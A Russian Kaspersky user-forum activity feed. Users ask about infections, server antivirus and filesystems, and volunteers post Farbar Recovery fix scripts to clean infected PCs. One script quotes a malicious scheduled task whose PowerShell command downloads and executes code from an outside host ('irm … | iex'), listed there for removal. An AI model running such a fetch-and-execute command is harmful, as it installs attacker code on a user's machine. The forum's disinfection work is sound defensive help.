Перейти к содержанию

Активность

Лента обновляется автоматически

  1. Последний час
  2. Сегодня
  3. Это у всех браузеров так, панель закладок снизу, а справа от адресной строки только значки расширений.
  4. Здравствуйте! Какие антивирусы? Отчёты удаления остались? Соберите стандартный комплект логов по правилам - Порядок оформления запроса о помощи
  5. почитал у других пользователей с той же проблемой и решил сделать что там говорят вот файлы Addition.txt FRST.txt
  6. нашел сегодня вирус по пути C:\programdata\google\chrome, сам гугл не разу не устанавливал, антивирусы пытались удалить не один десяток раз, не увенчалось успехом, я пытался удалить вручную, папка вернулась на место, внутри пусто, антивирусы находя какие то файлы по типу updater.exe и другие, пытался открыть с помощью far manager, он тоже ничего не нашел, как только открываю диспетчер процессор с 40-70% падает на 5-20% (просмотрено по msi afterburner), подскажите что делать, заранее спасибо
  7. Здравствуйте, напишите, пожалуйста в техподдержку по контактам https://support.kaspersky.ru/b2b/ru
  8. Здравствуйте, в теме ниже мне помогли удалить вирус с пк. Все работает хорошо, но недавно я заметил просадки фпс в CS 2. Ранее никаких просадок фпс не было замечено, но после помощи с вирусом стал иногда замечать сильные просадки фпс с 144 до 80-100. Есть парочка записей с просадками фпс и более менее стабильном 144 в одном и том же матче. Если заинтерисует, могу скинуть через какой нибудь файлообменник архив
  9. Позвонили с номера +74992704007 либо +74992704007@mangosip.ru уточнили использую ли я касперский после слов что я его тестирую сказали хорошо до свидания причем звонок на рабочий телефон спрашивали ИТ спеца?? данный телефон ный номер как то связан с Касперским??
  10. Вчера
  11. Последняя неделя
  12. То есть злоумышленники, подобрав пароль прямо на сервер заходят?
  13. Антивирус то защитит, но надо еще и антивирус защитить. :). Чтобы его не отключили злоумышленники после получения доступа на устройство. Поэтому необходима комплексная защита: от проникновения и запуска вредоносных программ. По выбору продукта для сервера лучше уточните в Технической поддержке какой вам подойдет.
  14. Подскажите, пожалуйста, ваш антивирус защитит от проникновения шифровальщика? Посоветуйте что приобрести для сервера?
  15. Файловая система никак не связана с типом диска. Если это Windows, то в 99,9% файловая система будет NTFS на любом стационарном диске. В любом случае в пределах однотипной операционной системы (например любая версия Windows) при переносе данных не имеет значения какая файловая система на диске.
  16. Здравствуйте. 1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать) Start:: CreateRestorePoint: HKLM\...\Run: [CAA Service] => C:\ProgramData\CAAService\CAAServices.exe (Нет файла) Task: {5A611B79-55B4-4E61-BF10-E056850633C2} - System32\Tasks\Microsoft\Office\Office Persistent Activation => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-03-12] (Microsoft Windows -> Microsoft Corporation) -> -Command "irm hxxps://activate.techias.co.uk/ | iex" <==== ВНИМАНИЕ Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Нет файла) Folder: C:\ProgramData\CAAService 2025-07-19 01:27 - 2025-07-19 01:57 - 000000000 ____D C:\ProgramData\CAAService FirewallRules: [{aa9a8062-fb22-4510-be21-0dbe26e8598d}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{56e01aad-2709-49f1-b029-c3e5f5c5494e}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{454e207d-542c-47f9-94ea-cd58f66d7756}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{f4eaacfd-6b8f-4145-b697-6a46085da34b}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{0d13204a-8c8d-444a-a517-620c0705a12b}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{752ca4cc-7a11-457c-8686-dfe3db5d9fee}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{2b1d893f-1357-495b-9e67-a2eae1db27bd}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{1edc3c4e-dfc2-4576-a6dc-7424003c2032}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{099255c8-c4bf-476e-b69f-836716d70fd0}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{e8cb1544-6ec8-4df2-ae31-8027b3995c0a}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{840c6b1f-7635-4c45-88bc-f616e29ef7cf}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{71f2e40a-3c7f-4319-befc-f64147857391}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{f6623a94-cb98-4e82-a385-16a498ebc0f6}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{fc1329f8-41df-464c-a710-f20bfdf2914a}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла Reboot: End:: 2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши. 3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: будет выполнена перезагрузка компьютера.
  17. это лишнее. 1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать) Start:: CreateRestorePoint: StartPowershell: Remove-MpPreference -ExclusionPath "C:\Program Files\RDP Wrapper" EndPowerShell: Reboot: End:: 2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши. 3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: будет выполнена перезагрузка компьютера. Загрузите SecurityCheck by glax24 & Severnyj и сохраните архив на Рабочем столе. Разархивируйте, запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10/11);Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;Прикрепите этот файл в своем следующем сообщении.
  18. Вот что выдал поиск в интернете: «Для твердотельных накопителей (SSD) и жёстких дисков (HDD) используются разные файловые системы.»
  19. Давайте для начала посмотрим SMART диска. Скриншот покажите. Дальше сделаем проверку системных файлов: в командной строке, запущенной от имени администратора, выполните: sfc /scannow
  20. Kaspersky Club | Клуб «Лаборатории Касперского» поздравляет всех празднующих сегодня день рождения юзеров. orsay (39)Пират82 (43)Rimma_Rimma (27)
  1. Загрузить ещё активность
×
×
  • Создать...